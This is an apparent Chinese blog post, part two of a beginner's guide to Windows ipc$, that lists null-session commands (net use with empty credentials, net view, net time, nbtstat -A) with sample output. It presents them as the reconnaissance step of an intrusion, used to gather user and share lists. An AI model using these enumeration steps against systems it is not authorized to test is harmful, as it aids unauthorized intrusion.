菜鸟必备:ipc$详细解释大全(二)

三、 空会话可以做什么

  对于NT,在默认安全设置下,借助空连接可以列举目标主机上的用户和共享,访问everyone权限的共享,访问小部分注册表等,并没有什么太大的利用价值;对2000作用更小,因为在Windows 2000 和以后版本中默认只有管理员和备份操作员有权从网络访问到注册表,而且实现起来也不方便,需借助工具。从这些我们可以看到,这种非信任会话并没有多大的用处,但从一次完整的ipc$入侵来看,空会话是一个不可缺少的跳板,因为我们从它那里可以得到户列表,这对于一个老练的黑客已经足够了。以下是空会话中能够使用的具体命令:

  1 首先,我们先建立一个空会话(需要目标开放ipc$)

  命令:net use //ip/ipc$ "" /user:""

  注意:上面的命令包括四个空格,net与use中间有一个空格,use后面一个,密码左右各一个空格。

  2 查看远程主机的共享资源

  命令:net view //IP

  解释:建立了空连接后,用此命令可以查看远程主机的共享资源,如果它开了共享,可以得到如下类似类似结果:

  在 //*.*.*.*的共享资源

  资源共享名 类型 用途 注释

  -----------------------------------------------------------

  NETLOGON Disk Logon server share

  SYSVOL Disk Logon server share

  命令成功完成。

  3 查看远程主机的当前时间

  命令:net time //IP

  解释:用此命令可以得到一个远程主机的当前时间。

  4 得到远程主机的NetBIOS用户名列表(需要打开自己的NBT)

  nbtstat -A IP

  用此命令可以得到一个远程主机的NetBIOS用户名列表(需要你的netbios支持),返回如下结果:

  Node IpAddress: [*.*.*.*] Scope Id: []

  NetBIOS Remote Machine Name Table

  Name Type Status

  ---------------------------------------------

  SERVER <00> UNIQUE Registered

  OYAMANISHI-H <00> GROUP Registered

  OYAMANISHI-H <1C> GROUP Registered

  SERVER <20> UNIQUE Registered

  OYAMANISHI-H <1B> UNIQUE Registered

  OYAMANISHI-H <1E> GROUP Registered

  SERVER <03> UNIQUE Registered

  OYAMANISHI-H <1D> UNIQUE Registered

  ..__MSBROWSE__.<01> GROUP Registered

  INet~Services <1C> GROUP Registered

  IS~SERVER......<00> UNIQUE Registered

  MAC Address = 00-50-8B-9A-2D-37

  以上就是我们经常使用空会话做的事情,好像也能获得不少东西哟,不过要注意一点:建立IPC$连接的操作会在EventLog中留下记录,不管你是否登录成功。 好了,那么下面我们就来看看ipc$所使用的端口是什么?
阅读更多
个人分类: 菜菜鸟的偷袭记录
想对作者说点什么? 我来说一句

电脑知识大全(菜鸟必备)

2008年06月28日 1.43MB 下载

ipc$详细解释大全

2008年07月15日 61KB 下载

没有更多推荐了,返回首页

加入CSDN,享受更精准的内容推荐,与500万程序员共同成长!
关闭
关闭